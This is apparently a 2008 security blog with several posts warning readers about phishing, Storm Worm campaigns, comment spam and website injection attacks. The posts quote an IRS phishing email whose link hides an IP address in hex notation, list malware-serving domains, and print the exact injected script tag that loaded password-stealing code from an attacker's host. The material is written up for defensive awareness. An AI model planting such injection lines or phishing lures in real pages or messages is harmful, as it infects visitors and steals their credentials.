SecurityZone.org - Information Security Blog

It appears there are now Adobe Flash vulnerabilities live and in the wild on several sites. This is not good considering some of the websites involved in the recent mass SQL injection attacks are aiming to exploit this vulnerability. Basically, if you can’t recall upgrading flash recently, you probably need to go ahead and do it.

You can check your current flash version by clicking here.

You can upgrade to the latest version of flash by clicking here.

Don’t wait - just upgrade right now!

The phishers out there are once again finding new ways to obfuscate their URLs in attempts to fool end users. I am pretty sure I saw this method mentioned this elsewhere recently, but I cannot recall where. In any event, this recent phish found itself into SPAM folder on one of my e-mail accounts. Notice the URL they provided:

Subject: Tax Notification
From: “Internal Revenue Service” <taxrefund@1×8c.8xdb95d4.irs.gov>
Date: Tue, May 20, 2008 6:36 am

Internal Revenue Service (IRS)
United States Department of the Treasury

Dear Taxpayer,

After the last annual calculations of your fiscal
activity we have determined that you are eligible
to receive a tax refund of $184.80.

Please submit the tax refund request and allow us
6-9 days in order to process it.

A refund can be delayed for a variety of reasons.
For example submitting invalid records or applying
after the deadline.

To access the form for your tax refund, use the following personalized link:

http://0×7C.0xDB11D1/www.irs.gov/

Regards,
Internal Revenue Service

Document Reference: (0×7C.0xDB11D1).

Notice that the URL is http://0×7C.0xDB11D1/www.irs.gov/ and that they used 0×7C.0xDB11D1 as the “Document Reference” in attempt to make it look more official. Well it turns out that 0×7C.0xDB11D1 really converts to an IP address in Taiwan - 124.219.17.209. Visiting this IP address or the URL abovve ends up redirecting you http://www.comtipps.de/www.irs.gov/index.htm?memberID=0×7C.0xDB.0×11.0xD1.

This then tries to get your social security number, credit card information (including CVV code and ATM PIN), date of birth, full name and address, phone number, and finally e-mail address (wouldn’t one assume they already have this if they e-mailed you? :D). Be on the look out for this slightly different take on an old trick.

It appears that CNN has been and will be the target of choice for Chinese hackers to show their displeasure with Western media coverage over “pro-independence protests in Tibet.” It would seem that some people in China have been offended by this coverage and are calling form attacks according to the website The Dark Visitor. They have provided details on several Chinese websites calling for attacks on www.cnn.com starting at 8:00 PM Beijing Time (8:00 AM EDT or 12:00 PM GMT) today April 19, 2008. However, according to another update on The Dark Visitor’s website, these attacks have seen been called off and are to be rescheduled.

According to a recent update on the CNN website, they have already observed several attacks that occurred this past Thursday. They took action to limit access to the site from certain regions and users in Asia may have experienced minor disruptions. These attacks appear to be either coincidental or preemptive in nature as they came two days earlier than called for. Arbor Networks is also monitoring this situation and has reported they have observed at least 36 different attacks thus far.

While the attacks have been “called off” for now, it will be interesting to see if they continue regardless — as scheduled or at a later date. It appears that attacks are expected and are being planned for. We can hope that they are unsuccessful regardless of the level of participation. We will update more if we learn anything new.

It appears that in addition to “supersameas.com”, the Storm Worm is now using and spamming itself out with several new domain names. These domain names are all with Chinese registrars and have been around since at least February but are just now starting to be used. In addition to serving up the executables for download, they are also attempting fire exploits at users that have the Internet Explorer browser. It is highly recommended that you do NOT visit these domains. Here is the list that is currently active:

biggetonething.cn
gasperoblue.cn
giftapplys.cn
gribontruck.cn
limpodrift.cn
loveinlive.cn
newoneforyou.cn
normocock.cn
orthelike.com
supersameas.com
thingforyoutoo.cn

They are coming through via e-mail as always and continuing their assault against Blogger (blogspot.com) sites. Searching Google shows the standard “love” related campaign. However, there is at least one result on Google showing politically motivated e-mails that are being sent as well. At least one Spam reported on the Google group “news.admin.net-abuse.sightings” shows an e-mail with the subject “Cowen confirmed as next Irish premier Options” and a body of “Police fire on protesters in Nepal” followed by a link to one of the above domains.

If you visit these sites with IE, you will quickly find yourself being attacked via different ActiveX objects. The first set of exploits will attempt to download “load.exe” to the system. It will then ultimately redirect the visitor to “flow.php” which is full of obfuscated JavaScript. It is recommended that you block the above domain names and do not visit them.

There’s a new round of Storm Worm e-mails going around taking advantage of our favorite technique, showing people what looks like a video and telling them they’re missing a codec to view it. Only these guys are using a rather blunt name for the files this time: StormCodec.exe and StormCodec8.exe - Not very subtle for the “Storm” Worm.

Users are lured this time by e-mail that wants them to visit the fast-flux domain “supersameas.com“. You can protect yourself and your organization at this juncture by blocking this domain. Once on the site there is a video looking image in the middle with the following message:

The video and download links point to the aforementioned files. Tip: You don’t want Storm Codec on your PC! Thanks to Jose from Arbor Networks for pointing out the update to me, otherwise I probably wouldn’t have noticed this until much later.

As you might know, this blog runs on WordPress which already supports RSS feeds. It seems a few of you out there and several search engine/social media sites have already manually located the URLs to subscribe to my RSS feed. In an effort to be more RSS and Web 2.0 friendly, I am now signed up with Feedburner and have put direct link to my RSS feed on this website (continue reading). Hopefully this change is relatively seamless for those that are already subscribed.

For anyone that is not subscribed, you can now click the RSS Feed link on the right panel on my website or subscribe via http://feeds.feedburner.com/securityzone. If you check in on my site regularly or even infrequently and have an RSS reader, I’d recommend signing up. It’ll help you keep up with my sporadic update schedule that not even I can predict!

You might have received some e-mails in the last few hours that link to some strange looking blogspot.com pages. A recent example I received a few hours ago pointed me to hxxp://aflmdiovanrd.blogspot.com/. The webpage then wants you to click to download files named “love.exe” or “withlove.exe“, as previously seen with the Valentine’s Day Storm Worm attack.

They are now using a new domain name for their fast-flux network. Each of these URLs presently links to “superdrugtesting.com” followed by the aforementioned binary names. They haven’t used an actual domain name or Google’s Blogger service with these attacks since the Christmas/New Year time frame. Looks like they are back at it again with a new technique.

Here’s a screen shot of what the page looks like:

Be on the look out for these e-mails and consider blocking “superdrugtesting.com” from your networks if possible. Since this domain name is part of a fast-flux network, you must block it by the domain and not IP address as there are thousands of them.

Edit: Let me add that if you were infected with this run of the Storm Worm or the recent Valentine’s Day campaign they did, you would most likely have “aromis.exe” running in your taskbar (not hidden this time) and it will reside in your root WINDOWS folder.

No jokes here - just a quick update on the ever exciting Storm Worm. It seems today it started out on an April Fool’s Day campaign aimed at infecting more systems. It’s still pointing you to infected machines by giving you a URL to an IP address. Right now the file names are “foolsday.exe“, “funny.exe“, and “kickme.exe“.

Click the thumb nail below for a larger view of what the full website looks like:

Nothing too fancy this time around again and it seems they’re a little late in their delivery. Normally they start a little earlier. Anyway, just be on the look out and don’t infect yourself accidentally.

I have written a blog or two in the past about comment spam to the blog. However, after having more time and a larger sampling, I can easily tell you 13 domains that are nearly the bane of my comment area’s existence. There is a set of 13 domains that all belong to the same individual or group that continually bombard my blogs with comment spam. They have been doing this for about 6 months now and always use different IP addresses. The following domain names are always used:

What is even more interesting is that these guys also easily get past my comment spam honey pot. They haven’t ever been caught by it. My comment spam has been reduced by 80% or so, as I now receive a couple new spams a day that aren’t caught by the comment spam honey pot. These, however, make it right through each time. It seems that all of these domain names involved are hosted on one of the following three IP addresses (at least right now):

These are all under a hosting provider at Ezzi.net. No idea if these are legitimately paid for boxes or compromised. I do not have evidence one way or another. I just know it’s really shady to spam so heavily from so many different IP addresses.

Just doing a Google search on a few of these domains like “airline333tickets.com” and “xanax7777pills.com” reveals over 65,000 search results. It would seem I am not the only one being heavily spammed by these guys. They’ve left hundred of blog comment spams in my queue. Here is an example one from earlier today:

—–

alumnimb | triath@Ced.com | phentermine-1-pills.com | IP: 68.185.223.151

How do you do…
Good stuff, very nicely done.
Good stuff, very nicely done!
http://viagra-77-pills.com/discount__viagra.html
http://viagra-77-pills.com/cheap–viagra.html

I simply mad about this forum!
There was merrily!

Like! Thank you!
The Author, you - super hero!
http://airline333tickets.com/allegiant_airline_tickets.html
http://cialis-l-pills.com/cialis_10_levitra.html
http://xanax777pills.com/order_10_xanax.htm

I am glad to find this forum !
Excellent forum, added to favorites!
http://phentermine-gl-pills.com/phentermine-9-online.html
http://cialis-l-pills.com/cialis_online.html

Thank you! I delighted!
Pretty nice forum, wants to see much more on it!
I Will be back!

Mar 16, 9:14 AM

—–

As we can see, our comments make superior use of the English language and link us to littering of exciting domains to visit. For what it’s worth, all of the domains are registered with either PUBLICDOMAINRESGISTRY.COM or ESTDOMAINS.

Hello all that find this page. I’d like to see if I could at least try and clear up some confusion for a few of you out there. There has been a lot of coverage over the last few days on two completely different attacks that some how end being linked together. We will look at both issues, describe them, and show how these attacks are not the same.

Chinese JavaScript Injection Attack

Over the past ten days or so, the following code has found its way into the actual source code of several thousand web pages:

<script src=http://www.2117966.net/fuckjp.js></script>

This JavaScript would attempt to do several things and load other files that would attempt to exploit the visitor. With this attack there are *NO* iframe tags involved. Just take a look at the above line of code and is exactly what was injected. This is almost indentical to the “uc8010.com” attacks a few months ago. In fact, we were able to find a few pages that appear to have had the line of code above injected right into the middle of where it used to refer to uc8010.com. In my opinion it looks very similar but seems to have different goals. In any event, if you get malware from the latest go around of these attacks, they will being stealing your passwords that you send with Internet Explorer.

An interesting side note worth mention is that Trend Micro’s own website was hit with this attack. They had several pages that can still be viewed in Google’s cache that were injected with the above script. It just goes to show this kind of unfortunate stuff can happen to anyone.

IFrame Injection Attack

The other attack that is getting a lot of attention is one that’s labeled an IFrame injection attack. However, in these instance the websites themselves are NOT actually hacked. Rather there is a lack of input validation and the attackers are able to cache search results involving links to malicious websites through an IFrame. In theory they could have just as easily put a JavaScript reference. It just happens they used an IFrame in their search terms that get cached. The websites themselves have not been compromised (i.e. if you just legitimately browsed on the website, you would not find yourself under attack). It appears some of them are attempting to exploit vulnerabilities in the user’s system and others are presenting them with fake errors about needing video codec. From what I have seen and what has been reported, the Zlob trojan is the target install for a lot or most of this stuff. You can read some more information and see examples of this at http://ddanchev.blogspot.com/.

Conclusion

As you can see, these are completely unrelated attacks. Other than the fact they involve the Internet and getting malware on a user’s system, there is really no other correlation. However, either group behind both attacks could easily use the techniques of the other, as could any other group. We have seen some interesting tricks from the bad guys lately. We’ll have to see what they come up with next.

Steven